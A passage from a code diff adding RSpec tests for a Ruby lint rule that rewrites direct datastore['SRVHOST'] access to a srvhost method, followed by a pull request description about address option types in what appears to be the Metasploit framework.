+             ^^^^^^^^^^^^^^^^^^^^ Lint/DatastoreSrvhostUsage: Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      host = srvhost
+    RUBY
+  end
+
+  it 'corrects datastore["SRVHOST"] in comparisons' do
+    expect_offense(<<~RUBY)
+      if datastore["SRVHOST"] == '0.0.0.0'
+         ^^^^^^^^^^^^^^^^^^^^ Lint/DatastoreSrvhostUsage: Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+        do_something
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      if srvhost == '0.0.0.0'
+        do_something
+      end
+    RUBY
+  end
+
+  it 'corrects datastore[\'SRVHOST\'] in method calls' do
+    expect_offense(<<~RUBY)
+      bind(datastore['SRVHOST'], port)
+           ^^^^^^^^^^^^^^^^^^^^ Lint/DatastoreSrvhostUsage: Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      bind(srvhost, port)
+    RUBY
+  end
+
+  it 'does not flag other datastore accesses' do
+    expect_no_offenses(<<~RUBY)
+      datastore['SRVPORT']
+    RUBY
+  end
+
+  it 'does not flag srvhost method calls' do
+    expect_no_offenses(<<~RUBY)
+      host = srvhost
+    RUBY
+  end
+
+  it 'does not flag other variables named datastore' do
+    expect_no_offenses(<<~RUBY)
+      my_datastore['SRVHOST']
+    RUBY
+  end
+end


### PR DESCRIPTION
This updates the `OptAddressRoutable` and `OptAddressLocal` then changes modules to use them as appropriate based on what type of address they need.

OptAddressLocal was just OptAddress with the ability to refer to a local address by the interface name, there was no validation that the address was actually locally assigned and could be bound to. The functionality would thus fit into OptAddressRoutable because in most (all?) scenarios the interface should have an address assigned that is routable. In the future, it would probably make sense to apply validation on OptAddressLocal to ensure it really is a local address, however to support port forwarding, this shouldn't be used in SRVHOST which is often a component in connection strings that are sent to targets. OptAddressLocal should be the ListenerBindAddress option which is used to explicitly define the interface to listen on in those scenarios.

This also updates a bunch of modules that were doing various checks to see if the address was a reasonable address to use for the purpose of connection strings. For those, the custom logic was removed and the SRVHOST datastore option was registered as OptAddressRoutable with a sane default.